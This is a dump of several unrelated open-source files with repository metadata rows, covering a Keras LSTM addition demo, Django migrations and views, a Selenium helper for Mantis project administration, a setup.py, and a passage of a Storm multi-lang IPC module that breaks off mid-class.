            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
            'tags': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
            'thumbnail': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
        }
    }
    complete_apps = ['blog']
| [
"bendavis78@gmail.com"
] | bendavis78@gmail.com |
3ca8fc6f5c55e2aa5a3785ebf17476db2b8dd918 | 1e3279c3ba088e0f1fa6b9fb4935c45383117b0a | /demo/lstm_encoder_decoder/encoder_decoder_lstm.py | 75128d3905414631734e12b91b8d0e954466cf46 | [] | no_license | pleiadian53/tpheno | fcbeb70bc07e6ce7f1b1c19db99fd8b2a8079bf4 | b8692f84143856ff672b3c7432f83c5aa5fe3bb2 | refs/heads/master | 2023-01-22T04:10:46.862687 | 2020-12-04T21:11:03 | 2020-12-04T21:11:03 | 318,626,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,156 | py | from random import seed
from random import randint
from numpy import array
from math import ceil
from math import log10
from math import sqrt
from numpy import argmax
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import TimeDistributed
from keras.layers import RepeatVector
import random, os, re
# generate lists of random integers and their sum
def random_sum_pairs(n_examples, n_numbers, largest):
    """Generate `n_examples` addition problems.

    Each X row holds `n_numbers` random ints drawn from [1, largest];
    the matching y entry is their sum.
    """
    X, y = [], []
    for _ in range(n_examples):
        terms = [randint(1, largest) for _ in range(n_numbers)]
        X.append(terms)
        y.append(sum(terms))
    return X, y
# convert data to strings
def to_string(X, y, n_numbers, largest):
    """Render each input/output pair as fixed-width strings.

    Inputs become '+'-joined expressions ('1+2+3'), outputs become the sum;
    both are left-padded with spaces to the maximum possible width so every
    example has the same length.
    """
    in_width = int(n_numbers * ceil(log10(largest + 1)) + n_numbers - 1)
    Xstr = ['+'.join(str(n) for n in pattern).rjust(in_width) for pattern in X]
    out_width = int(ceil(log10(n_numbers * (largest + 1))))
    ystr = [str(pattern).rjust(out_width) for pattern in y]
    return Xstr, ystr
# integer encode strings
def integer_encode(X, y, alphabet):
    """Map every character of each string in X and y to its index in
    `alphabet`, returning two lists of integer sequences."""
    lookup = {ch: i for i, ch in enumerate(alphabet)}
    Xenc = [[lookup[ch] for ch in pattern] for pattern in X]
    yenc = [[lookup[ch] for ch in pattern] for pattern in y]
    return Xenc, yenc
# one hot encode
def _one_hot_sequences(sequences, max_int):
    """One-hot encode every integer of every sequence into a length-`max_int`
    binary vector."""
    encoded = list()
    for seq in sequences:
        pattern = list()
        for index in seq:
            vector = [0 for _ in range(max_int)]
            vector[index] = 1
            pattern.append(vector)
        encoded.append(pattern)
    return encoded


def one_hot_encode(X, y, max_int):
    """One-hot encode both the input and output integer sequences.

    The previous version duplicated the identical encoding loop for X and y;
    the shared helper removes that duplication.
    """
    return _one_hot_sequences(X, max_int), _one_hot_sequences(y, max_int)
# generate an encoded dataset
def generate_data(n_samples, n_numbers, largest, alphabet):
    """Generate a fully encoded addition dataset.

    Pipeline: random sum pairs -> padded strings -> integer indices ->
    one-hot vectors.  Returns (X, y) as numpy arrays of shape
    (n_samples, in_seq_len, len(alphabet)) and
    (n_samples, out_seq_len, len(alphabet)).

    NOTE(review): the unused/commented-out debug helpers and the stray
    `print(X[:10])` of every generated batch were removed.
    """
    # generate pairs
    X, y = random_sum_pairs(n_samples, n_numbers, largest)
    # convert to strings
    X, y = to_string(X, y, n_numbers, largest)
    # integer encode
    X, y = integer_encode(X, y, alphabet)
    # one hot encode
    X, y = one_hot_encode(X, y, len(alphabet))
    # return as numpy arrays
    return array(X), array(y)
# invert encoding
def invert(seq, alphabet):
    """Decode a sequence of one-hot vectors back into a string: each vector
    contributes the alphabet symbol at its argmax position."""
    return ''.join(alphabet[argmax(vector)] for vector in seq)
# configure problem
def app(**kargs):
    """End-to-end demo: train an encoder-decoder LSTM to 'read' padded
    addition expressions (e.g. ' 10+3+7') and emit the sum as characters.

    Builds the model, fits on 75k generated examples for one epoch,
    evaluates on 100 fresh examples, then prints 10 sample predictions.
    """
    # number of math terms
    n_terms = 3
    # largest value for any single input digit
    largest = 10
    # scope of possible symbols for each input or output time step
    alphabet = [str(x) for x in range(10)] + ['+', ' ']
    # size of alphabet: (12 for 0-9, + and ' ')
    n_chars = len(alphabet)
    # length of encoded input sequence (8 for '10+10+10)
    n_in_seq_length = int(n_terms * ceil(log10(largest+1)) + n_terms - 1)
    # length of encoded output sequence (2 for '30')
    n_out_seq_length = int(ceil(log10(n_terms * (largest+1))))
    # define LSTM: encoder LSTM -> RepeatVector bridge -> decoder LSTM
    # -> per-timestep softmax over the alphabet.
    model = Sequential()
    model.add(LSTM(75, input_shape=(n_in_seq_length, n_chars)))
    model.add(RepeatVector(n_out_seq_length))
    model.add(LSTM(50, return_sequences=True))
    model.add(TimeDistributed(Dense(n_chars, activation='softmax')))
    model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
    print(model.summary())
    # fit LSTM
    X, y = generate_data(75000, n_terms, largest, alphabet)
    model.fit(X, y, epochs=1, batch_size=32)
    # evaluate LSTM
    X, y = generate_data(100, n_terms, largest, alphabet)
    loss, acc = model.evaluate(X, y, verbose=0)
    print('Loss: %f, Accuracy: %f' % (loss, acc*100))
    # predict
    for _ in range(10):
        # generate an input-output pair
        X, y = generate_data(1, n_terms, largest, alphabet)
        # make prediction
        yhat = model.predict(X, verbose=0)
        # decode input, expected and predicted
        in_seq = invert(X[0], alphabet)
        out_seq = invert(y[0], alphabet)
        predicted = invert(yhat[0], alphabet)
        print('%s = %s (expect %s)' % (in_seq, predicted, out_seq))
    return
def t_encode_decode(**kargs):
    """Placeholder for encode/decode experiments; currently a no-op."""
    return None
def test(**kargs):
    """Smoke test for the data pipeline: generate a dataset with the same
    problem configuration as app() and print a couple of examples.

    NOTE(review): n_chars / n_in_seq_length / n_out_seq_length are computed
    but unused here; they mirror the configuration in app().
    """
    def show_examples(X, y, n=10):
        # Print up to n+1 encoded examples for eyeballing.
        for i, x in enumerate(X):
            print(' + [%d] x=%s' % (i, x))
            print('       y=%s' % y)
            if i >= n: break
        return
    # number of math terms
    n_terms = 3
    # largest value for any single input digit
    largest = 10
    # scope of possible symbols for each input or output time step
    alphabet = [str(x) for x in range(10)] + ['+', ' ']
    # size of alphabet: (12 for 0-9, + and ' ')
    n_chars = len(alphabet)
    # length of encoded input sequence (8 for '10+10+10)
    n_in_seq_length = int(n_terms * ceil(log10(largest+1)) + n_terms - 1)
    # length of encoded output sequence (2 for '30')
    n_out_seq_length = int(ceil(log10(n_terms * (largest+1))))
    ### main application
    # app(**kargs)
    ### data generation
    X, y = generate_data(75000, n_terms, largest, alphabet)
    show_examples(X, y, n=2)
    return
# Run the pipeline smoke test when executed as a script.
if __name__ == "__main__":
    test()
| [
"barnettchiu@gmail.com"
] | barnettchiu@gmail.com |
e68e5d91b7780d3fad236dfa0ad58ca34d4e4f9e | 8b3ca44ee3d990233e74655b7131d616094f70c2 | /experiments/cross_validation/movielens_100K/poisson_gamma_gamma.py | cc0781ad2618e0f9db05184959fc4e28140035a0 | [] | no_license | zshwuhan/BMF_Priors | 8b8c54271285a72d2085a56a9475c0756f375e67 | 6a600da1c41f1ccde2f2ba99298b40e68fb9910a | refs/heads/master | 2021-05-13T19:10:07.203215 | 2017-12-01T13:30:21 | 2017-12-01T13:30:21 | 116,883,181 | 1 | 0 | null | 2018-01-09T23:36:13 | 2018-01-09T23:36:13 | null | UTF-8 | Python | false | false | 1,609 | py | '''
Run nested cross-validation experiment on the MovieLens 100K dataset, with
Poisson likelihood, Gamma priors, and Gamma hierarchical priors.
'''
project_location = "/Users/thomasbrouwer/Documents/Projects/libraries/"
import sys
sys.path.append(project_location)
from BMF_Priors.code.models.bmf_poisson_gamma_gamma import BMF_Poisson_Gamma_Gamma
from BMF_Priors.code.cross_validation.nested_matrix_cross_validation import MatrixNestedCrossValidation
from BMF_Priors.data.movielens.load_data import load_movielens_100K
''' Settings BMF model. '''
method = BMF_Poisson_Gamma_Gamma
R, M = load_movielens_100K()
hyperparameters = { 'a':1., 'ap':1., 'bp':1. }
train_config = {
'iterations' : 200,
'init' : 'random',
}
predict_config = {
'burn_in' : 180,
'thinning' : 1,
}
''' Settings nested cross-validation. '''
K_range = [1,2,3]
no_folds = 5
no_threads = 5
parallel = False
folder_results = './results/poisson_gamma_gamma/'
output_file = folder_results+'results.txt'
files_nested_performances = [folder_results+'fold_%s.txt'%(fold+1) for fold in range(no_folds)]
''' Construct the parameter search. '''
parameter_search = [{'K':K, 'hyperparameters':hyperparameters} for K in K_range]
''' Run the cross-validation framework. '''
nested_crossval = MatrixNestedCrossValidation(
method=method,
R=R,
M=M,
K=no_folds,
P=no_threads,
parameter_search=parameter_search,
train_config=train_config,
predict_config=predict_config,
file_performance=output_file,
files_nested_performances=files_nested_performances,
)
nested_crossval.run(parallel=parallel) | [
"tab43@cam.ac.uk"
] | tab43@cam.ac.uk |
ef823c380ac1dc37437cf35de1d03db83e68f33f | 0f68edfa22a0c90ae18309e50dac79e1e4c82c7f | /fixture/project.py | a5ed7c726d088aaedfaa4574869e9b2814a2c643 | [
"Apache-2.0"
] | permissive | Elen-T/Py_Mantis | 92118050b0cbdb05dadb93624a8c02c3d7f7044b | 011ec80678e111b0b83216874738727117435b37 | refs/heads/master | 2020-09-07T02:51:43.687346 | 2019-11-13T06:28:53 | 2019-11-13T06:28:53 | 220,635,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,745 | py | from model.project import Project
from selenium.webdriver.support.select import Select
class ProjectHelper:
    """Page-object style helper for Mantis 'Manage Projects' administration,
    driving the shared Selenium WebDriver held by the application fixture."""
    def __init__(self, app):
        # `app` is the application fixture owning the WebDriver (`app.wd`).
        self.app = app
    def open_project_page(self):
        """Navigate: Manage -> Manage Projects."""
        wd = self.app.wd
        wd.find_element_by_link_text("Manage").click()
        wd.find_element_by_link_text("Manage Projects").click()
    def authenticate(self):
        """Re-enter the admin password on the confirmation screen."""
        wd = self.app.wd
        wd.find_element_by_name("password").click()
        wd.find_element_by_name("password").clear()
        wd.find_element_by_name("password").send_keys("root")
        wd.find_element_by_xpath(
            "(.//*[normalize-space(text()) and normalize-space(.)='Password'])[1]/following::input[2]").click()
    def create_project(self, project):
        """Open the create-project form and submit name/description from the
        given Project model (status is always set to 'release')."""
        wd = self.app.wd
        wd.find_element_by_xpath("(.//*[normalize-space(text()) and normalize-space(.)='Manage Configuration'])[1]/following::input[2]").click()
        wd.find_element_by_name("name").click()
        wd.find_element_by_name("name").clear()
        wd.find_element_by_name("name").send_keys(project.name)
        wd.find_element_by_name("status").click()
        Select(wd.find_element_by_name("status")).select_by_visible_text("release")
        wd.find_element_by_name("status").click()
        wd.find_element_by_name("description").click()
        wd.find_element_by_name("description").clear()
        wd.find_element_by_name("description").send_keys(project.description)
        wd.find_element_by_xpath("(.//*[normalize-space(text()) and normalize-space(.)='Description'])[1]/following::input[1]").click()
        # Give the page time to reload after submit.
        wd.implicitly_wait(10)
    def return_to_view_page(self):
        """Click the header image to return to the main view page."""
        wd = self.app.wd
        wd.find_element_by_xpath("(.//*[normalize-space(text()) and normalize-space(.)='administrator'])[1]/preceding::img[1]").click()
    def logout(self):
        """Log out of the application."""
        wd = self.app.wd
        wd.find_element_by_link_text("Logout").click()
    def count(self):
        """Return the number of project rows in the Manage Projects table."""
        wd = self.app.wd
        #return len(wd.find_elements_by_xpath("//body//tr[]"))
        return len(wd.find_elements_by_xpath("//div[@class='widget-box widget-color-blue2']/div[2]/div[1]/div[2]/table/tbody/tr"))
    def delete(self):
        # NOTE(review): stub - acquires the driver but performs no action yet.
        wd = self.app.wd
    def open_project_by_index(self, index):
        """Open the edit page of the project row at `index`."""
        wd = self.app.wd
        self. open_project_page()
        row = wd.find_elements_by_xpath("//div[@class='table-responsive']/table/tbody/tr")[index]
        cell = row.find_elements_by_tag_name("td")[0]
        cell.find_element_by_tag_name("a").click()
    def del_project_by_index(self, index):
        """Delete the project at `index`: open its edit page, then click the
        delete button twice (action + confirmation)."""
        wd = self.app.wd
        self.open_project_page()
        wd.find_elements_by_css_selector("td > a[href*='manage_proj_edit_page.php?project_id']")[index].click()
        wd.find_element_by_css_selector("input[value='Delete Project']").click()
        wd.find_element_by_css_selector("input[value='Delete Project']").click()
    """def get_project_list(self):
        wd = self.app.wd
        self.open_project_page()
        self.project_list = []
        for element in wd.find_elements_by_xpath("//div[@class='table-responsive']/table/tr"):
            cells = element.find_elements_by_tag_name("td")
            name = cells[1]
            description = cells[5]
            self.project_list.append(Project(name=name, description=description))
        return list(self.project_list)"""
    def get_project_list(self):
        """Scrape (id, name) for every project listed on the manage page."""
        wd = self.app.wd
        self.open_project_page()
        project_list = []
        for el in wd.find_elements_by_css_selector("td > a[href*='manage_proj_edit_page.php?project_id']"):
            # The 'search' part of the href is '?project_id=NNN'; slice off the key.
            id = el.get_attribute('search')[12:]
            name = el.text
            project_list.append(Project(name=name, id=id))
        return project_list
"547457457545678@mail.ru"
] | 547457457545678@mail.ru |
34133b8a2f6433f58642cbe7cbcfc7c5e82631e1 | cdbaf39c58364fc9e788a17c5aa4e583829785d6 | /order/migrations/0050_auto_20160720_1126.py | 79358761b5a699a34d142440a08d94d39b48824c | [] | no_license | JaeLee18/Django_eCommerce | a0f83965166e7b75225e3b4828c3a36473a6c5c8 | 860c99ca53557c3750dafd2f4dbf8e195de4d752 | refs/heads/master | 2021-06-08T22:49:25.468838 | 2016-11-17T01:45:19 | 2016-11-17T01:45:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 11:26
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the order app.

    NOTE(review): both defaults below were frozen when makemigrations ran
    (the datetime literal and the fixed uid string) -- typical of passing a
    call result instead of a callable as `default`.  Harmless in a historical
    migration, so left untouched.
    """

    dependencies = [
        ('order', '0049_auto_20160720_1125'),
    ]

    operations = [
        migrations.AlterField(
            model_name='order',
            name='start',
            # Timestamp captured at generation time, not evaluated per row.
            field=models.DateField(blank=True, default=datetime.datetime(2016, 7, 20, 11, 26, 19, 495304), null=True),
        ),
        migrations.AlterField(
            model_name='order',
            name='uid',
            field=models.CharField(default='S2B1JVEUBPFMEMYF', max_length=16, null=True),
        ),
    ]
| [
"lee2161@purdue.edu"
] | lee2161@purdue.edu |
b47cf13193324adf9fd276752b4bc7434550a170 | 90736089f21562da1fb189aa80e6ba1012682aa5 | /lab-manual/vpython-intro/programs/vpython-intro-vectors.py | f80c7638d0afecfa318a13699961ff82dbd18b63 | [] | no_license | CapaFenLisesi/Physics-For-Video-Games | e9e1a1d924f867e9bee05fae0d4557fc2abe97ad | 8ca7dda24977407055eba7d29d9da5970432ff77 | refs/heads/master | 2021-01-22T15:16:13.635568 | 2016-06-11T02:24:52 | 2016-06-11T02:24:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | from __future__ import division
from visual import *
# Place a ball above a green slab, then teleport it and print its
# position before and after the move.
ball = sphere(pos=(0, 6, 0), radius=1, color=color.orange)
box(pos=(0, 0, 0), length=78, height=4, width=36, color=color.green)
print(ball.pos)
ball.pos = vector(32, 7, -12)
print(ball.pos)
| [
"atitus@highpoint.edu"
] | atitus@highpoint.edu |
f10efb10e5e3e9c6b8d123106d18073cfb8124f2 | fc5dc03dccb44bc67fa1b4e4c27ba88fe7480f87 | /setup.py | c19c817fdb418c18ee7c885054261ecbb4aa78fb | [] | no_license | uchagani/pixel_ring | b1632168f825723af83fadb8bce79b1a6c940c94 | 27babb6e9f591390e89cd14f4959f8ae86ad6383 | refs/heads/master | 2021-08-15T02:40:40.308514 | 2017-11-17T06:51:01 | 2017-11-17T06:51:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,425 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
# Long description shown on PyPI.
README = \
'''
APA102 pixel ring
'''

# Runtime dependency: SPI access to the APA102 LED driver.
requirements = [
    'spidev'
]

setup_requirements = [
    # TODO: put setup requirements (distutils extensions, etc.) here
]

# Test-only dependencies (used by `setup.py test`).
test_requirements = [
    'pytest'
]

setup(
    name='pixel-ring',
    version='0.0.1',
    description="APA 102 pixel ring",
    long_description=README,
    author="Yihui Xiong",
    author_email='yihui.xiong@hotmail.com',
    url='https://github.com/respeaker/pixel_ring',
    packages=find_packages(include=['pixel_ring']),
    include_package_data=True,
    install_requires=requirements,
    entry_points={
        # No console scripts are exposed yet.
        'console_scripts': [
        ],
    },
    license="GNU General Public License v2",
    zip_safe=False,
    keywords='voice doa beamforming kws',
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',
        'Natural Language :: English',
        "Programming Language :: Python :: 2",
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
    ],
    test_suite='tests',
    tests_require=test_requirements,
    setup_requires=setup_requirements,
)
| [
"yihui.xiong@hotmail.com"
] | yihui.xiong@hotmail.com |
f8dcb79496b226693eb440a4735a89a8bb445860 | 684b61f3405ed01b4184b222da342bd1533e4b90 | /shop/migrations/0002_auto_20200406_1505.py | 17c49a7cd1d4a26822a3030c54e37da8409a58fd | [] | no_license | Mubashar-javed/myshop | 6379d2568e969db9f8dc30354966d4054463959f | 0248c2cb6e26500b5fd1404dad45b14ebf1092ac | refs/heads/master | 2023-05-26T08:01:09.067626 | 2022-12-08T09:36:10 | 2022-12-08T09:36:10 | 254,266,547 | 0 | 0 | null | 2023-05-23T01:08:14 | 2020-04-09T03:57:41 | Python | UTF-8 | Python | false | false | 353 | py | # Generated by Django 2.2.5 on 2020-04-06 10:05
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: renames the typo'd Product field
    'cereated' to 'created'."""

    dependencies = [
        ('shop', '0001_initial'),
    ]

    operations = [
        migrations.RenameField(
            model_name='product',
            old_name='cereated',
            new_name='created',
        ),
    ]
| [
"mubasharbravo302@gmail.com"
] | mubasharbravo302@gmail.com |
aed11a2c4d13c0d479bf8465197e8185bcd75c06 | 14f0c423c109a75a8cbd10ca8c526f1482e3e385 | /Python/Django/multuple_apps/apps/blogs/views.py | 56e65b2b27072046cd5e9fc24cc6c724cda4ae09 | [] | no_license | thisolivier/dojo-master | 21fd5d13e25321cce0558cab3b0c0335774e173c | 9486f6b2af2148a296e2a238eee2b814fe0831fe | refs/heads/master | 2021-01-01T06:47:07.162851 | 2017-09-16T00:54:05 | 2017-09-16T00:54:05 | 97,511,225 | 0 | 0 | null | 2017-09-16T00:42:26 | 2017-07-17T18:51:47 | Python | UTF-8 | Python | false | false | 734 | py | from django.shortcuts import render
# Create your views here.
def blog_root(request):
    """Render the blog index page (Python 2 print used as debug tracing)."""
    print "---> Generating root template"
    return render(request, 'blogs/index.html')
def blog_new(request):
    """Render the 'new blog' page; currently reuses the index template."""
    print "---> Generating new blog template"
    return render(request, 'blogs/index.html')
def blog_create(request):
    """Handle blog creation; currently just renders the index template."""
    print "---> Generating create blog template"
    return render(request, 'blogs/index.html')
def blog_num(request, number):
    """Render the page for blog *number*; currently reuses the index template."""
    # NOTE(review): "create blog number" looks copy-pasted from blog_create;
    # confirm the intended trace wording before changing the message.
    print "---> Generating create blog number {}".format(number)
    return render(request, 'blogs/index.html')
def blog_modify(request, number, action):
    """Render the *action* (e.g. edit/delete) page for blog *number*."""
    print "---> Generating {}ing template for blog number {}".format(action, number)
    return render(request, 'blogs/index.html')
"olivier.butler@gmail.com"
] | olivier.butler@gmail.com |
d0479fa248e992aff2046f147e18df724d37ad7f | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/AirSage_Petrel/Petrel-master/petrel/petrel/storm.py | bd46ee3d47e13255528269e2dc4ef4455261a969 | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 16,718 | py | from __future__ import print_function
import sys
import os
import time
import socket
import logging
from collections import deque
import json
import six
# Module-wide logger for Storm IPC activity.
storm_log = logging.getLogger('storm')

# When True, tasks log per-tuple timing stats (see initialize_profiling()).
TUPLE_PROFILING = False

# JSON (de)serialization hooks, bound as names so an alternative codec can
# be swapped in at one place.  Bound directly instead of through pointless
# one-argument lambda wrappers (PEP 8 / E731).
json_encode = json.dumps
json_decode = json.loads

BLANK_LINE_CHECK = True

# Save old stdout so we can still write to it after redirecting.
old_stdout = sys.stdout

# TODO: Get this value from a topology configuration setting.
MAX_MESSAGE_SIZE = 16777216
class StormIPCException(Exception):
    """Raised when communication with the Storm parent process fails
    (EOF while reading stdin, or an error writing to stdout)."""
    pass
#reads lines and reconstructs newlines appropriately
def readMsg():
    """Read one JSON message from stdin and return the decoded object.

    A message is one or more newline-terminated lines followed by a line
    containing only "end".  Raises StormIPCException on EOF.
    """
    # Collect lines and join once: O(n) instead of the quadratic
    # string concatenation the previous version performed per line.
    parts = []
    while True:
        line = sys.stdin.readline()
        if not line:
            raise StormIPCException('Read EOF from stdin')
        if line[0:-1] == "end":
            break
        parts.append(line)
    msg = ''.join(parts)
    # Strip the final newline before decoding, as before.
    return json_decode(msg[0:-1])
# Set to the Bolt or Spout class by the active run() loop; selects the
# emit implementation used by __emit()/emitMany().
MODE = None
# When set (by BasicBolt), every emit is automatically anchored to this tuple.
ANCHOR_TUPLE = None
#queue up commands we read while trying to read taskids
pending_commands = deque()
def readTaskIds():
    """Return the next task-id list sent by Storm.

    Non-list messages seen while waiting are queued on pending_commands
    for readCommand() to consume later.
    """
    if pending_taskids:
        return pending_taskids.popleft()
    incoming = readMsg()
    # Task-id messages are JSON arrays; everything else is a command.
    while type(incoming) is not list:
        pending_commands.append(incoming)
        incoming = readMsg()
    return incoming
#queue up taskids we read while trying to read commands/tuples
pending_taskids = deque()
def readCommand():
    """Return the next command/tuple message sent by Storm.

    List messages (task ids) seen while waiting are queued on
    pending_taskids for readTaskIds() to consume later.
    """
    if pending_commands:
        return pending_commands.popleft()
    incoming = readMsg()
    while type(incoming) is list:
        pending_taskids.append(incoming)
        incoming = readMsg()
    return incoming
def readTuple():
    """Read the next command from Storm and wrap it in a Tuple instance."""
    cmd = readCommand()
    return Tuple(cmd["id"], cmd["comp"], cmd["stream"], cmd["task"], cmd["tuple"])
def sendMsgToParent(msg):
    """JSON-encode *msg* and write it plus the "end" sentinel to the real
    stdout, flushing immediately.

    Raises StormIPCException if the pipe to the Storm worker is broken.
    """
    print(json_encode(msg), file=old_stdout)
    print('end', file=old_stdout)
    try:
        old_stdout.flush()
    except (IOError, OSError) as e:
        # Translate pipe errors into the module's IPC exception type.
        storm_log.exception(str(e))
        raise StormIPCException('%s error [Errno %d] in sendMsgToParent: %s' % (
            type(e).__name__,
            e.errno,
            str(e)))
# This function is probably obsolete with the addition of the new
# reportError() function.
# TODO: Consider getting rid of this function and call reportError() instead.
# However, need to consider the case where we are running on an older version
# of Storm where the Storm back end does not support reportError()? Can we
# detect that case and use this function instead?
def sendFailureMsgToParent(msg):
    """This function is kind of a hack, but useful when a Python task
    encounters a fatal exception. "msg" should be a simple string like
    "E_SPOUTFAILED". This function sends "msg" as-is to the Storm worker,
    which tries to parse it as JSON. The hacky aspect is that we
    *deliberately* make it fail by sending it non-JSON data. This causes
    the Storm worker to throw an error and restart the Python task. This
    is cleaner than simply letting the task die without notifying Storm,
    because this way Storm restarts the task more quickly."""
    assert isinstance(msg, six.string_types)
    # No flush here: the message is framed like a normal protocol message
    # (payload then "end") but the payload is intentionally not JSON.
    print(msg, file=old_stdout)
    print('end', file=old_stdout)
    storm_log.error('Sent failure message ("%s") to Storm', msg)
def sync():
    """Acknowledge a heartbeat/command by sending the 'sync' message."""
    sendMsgToParent({'command':'sync'})
def sendpid(heartbeatdir):
    """Report this process's pid to Storm and touch an empty pid file
    in *heartbeatdir* (Storm uses it to kill the task on shutdown)."""
    pid = os.getpid()
    sendMsgToParent({'pid':pid})
    # Create-and-close just to leave an empty file named after the pid.
    open(heartbeatdir + "/" + str(pid), "w").close()
def emit(*args, **kwargs):
    """Emit one tuple; if task ids were requested, read and return them."""
    result = __emit(*args, **kwargs)
    if result:
        return readTaskIds()
def emitMany(*args, **kwargs):
    """A more efficient way to emit a number of tuples at once.

    Dispatches to the bolt or spout batch implementation based on MODE.
    """
    global MODE
    if MODE == Bolt:
        emitManyBolt(*args, **kwargs)
    elif MODE == Spout:
        emitManySpout(*args, **kwargs)
def emitDirect(task, *args, **kwargs):
    """Emit a tuple directly to the given *task* id (direct grouping)."""
    kwargs["directTask"] = task
    __emit(*args, **kwargs)
def __emit(*args, **kwargs):
    """Dispatch a single emit to the bolt or spout implementation (MODE)."""
    global MODE
    if MODE == Bolt:
        return emitBolt(*args, **kwargs)
    elif MODE == Spout:
        return emitSpout(*args, **kwargs)
def emitManyBolt(tuples, stream=None, anchors = [], directTask=None):
    """Emit many bolt tuples with a single stdout write (no task ids).

    NOTE(review): unlike sendMsgToParent() this does not flush old_stdout;
    confirm callers rely on a later flush.
    """
    global ANCHOR_TUPLE
    if ANCHOR_TUPLE is not None:
        anchors = [ANCHOR_TUPLE]
    m = {
        "command": "emit",
        "anchors": [a.id for a in anchors],
        "tuple": None,
        "need_task_ids": False,
    }
    if stream is not None:
        m["stream"] = stream
    if directTask is not None:
        m["task"] = directTask
    lines = []
    for tup in tuples:
        m["tuple"] = tup
        lines.append(json_encode(m))
        lines.append('end')
    # Write the framed messages themselves.  The previous version passed the
    # list object to print(), which emitted its repr -- not valid protocol
    # output (each JSON payload must be followed by an "end" line, exactly
    # as sendMsgToParent() writes them).
    if lines:
        print('\n'.join(lines), file=old_stdout)
def emitBolt(tup, stream=None, anchors = [], directTask=None, need_task_ids=False):
    """Send a single bolt emit command to Storm.

    Returns need_task_ids so the caller knows whether a task-id list
    should be read back.
    """
    global ANCHOR_TUPLE
    # BasicBolt sets ANCHOR_TUPLE to the tuple being processed; it
    # overrides any caller-supplied anchors.
    if ANCHOR_TUPLE is not None:
        anchors = [ANCHOR_TUPLE]
    m = {
        "command": "emit",
        "anchors": [a.id for a in anchors],
        "tuple": tup,
        "need_task_ids": need_task_ids,
    }
    if stream is not None:
        m["stream"] = stream
    if directTask is not None:
        m["task"] = directTask
    sendMsgToParent(m)
    return need_task_ids
def emitManySpout(tuples, stream=None, id=None, directTask=None, need_task_ids=False):
    """Emit many spout tuples with a single stdout write.

    NOTE(review): unlike sendMsgToParent() this does not flush old_stdout;
    confirm callers rely on a later flush.
    """
    m = {
        "command": "emit",
        "tuple": None,
        "need_task_ids": need_task_ids,
    }
    if id is not None:
        m["id"] = id
    if stream is not None:
        m["stream"] = stream
    if directTask is not None:
        m["task"] = directTask
    lines = []
    for tup in tuples:
        m["tuple"] = tup
        lines.append(json_encode(m))
        lines.append('end')
    # Join and write the framed messages.  The previous version passed the
    # list object to print(), emitting its repr instead of the JSON/"end"
    # lines the multi-lang protocol expects.
    if lines:
        print('\n'.join(lines), file=old_stdout)
def emitSpout(tup, stream=None, id=None, directTask=None, need_task_ids=False):
    """Send a single spout emit command to Storm.

    *id* is the optional message id used for reliable (ack/fail) emits.
    Returns need_task_ids so the caller knows whether to read task ids back.
    """
    m = {
        "command": "emit",
        "tuple": tup,
        "need_task_ids": need_task_ids,
    }
    if id is not None:
        m["id"] = id
    if stream is not None:
        m["stream"] = stream
    if directTask is not None:
        m["task"] = directTask
    sendMsgToParent(m)
    return need_task_ids
def ack(tup):
    """Acknowledge a tuple (marks its tree as successfully processed)."""
    sendMsgToParent({"command": "ack", "id": tup.id})
def ackId(tupid):
    """Acknowledge a tuple when you only have its ID, not the Tuple object."""
    sendMsgToParent({"command": "ack", "id": tupid})
def fail(tup):
    """Fail a tuple (Storm will replay it if the spout emitted it reliably)."""
    sendMsgToParent({"command": "fail", "id": tup.id})
def reportError(msg):
    """Report an error message to Storm (shown in the Storm UI)."""
    sendMsgToParent({"command": "error", "msg": msg})
def log(msg):
    """Send a log message to the Storm worker's log."""
    sendMsgToParent({"command": "log", "msg": msg})
def initComponent():
    """Perform the multi-lang handshake.

    Redirects stdio to loggers, reads the setup message from Storm,
    writes the pid file, and returns [conf, context].
    """
    # Redirect stdout and stderr to logger instances. This is particularly
    # important for stdout so 'print' statements won't crash the Storm Java
    # worker.
    sys.stdout = LogStream(logging.getLogger('storm.stdout'))
    sys.stderr = LogStream(logging.getLogger('storm.stderr'))
    setupInfo = readMsg()
    storm_log.info('Task received setupInfo from Storm: %s', setupInfo)
    sendpid(setupInfo['pidDir'])
    storm_log.info('Task sent pid to Storm')
    return [setupInfo['conf'], setupInfo['context']]
class Tuple(object):
    """One Storm tuple plus its routing metadata.

    __slots__ keeps instances small, since one is created per message.
    """

    __slots__ = ['id', 'component', 'stream', 'task', 'values']

    def __init__(self, id, component, stream, task, values):
        self.id = id
        self.component = component
        self.stream = stream
        self.task = task
        self.values = values

    def __eq__(self, other):
        # Only other Tuple instances can compare equal.
        if not isinstance(other, Tuple):
            return False
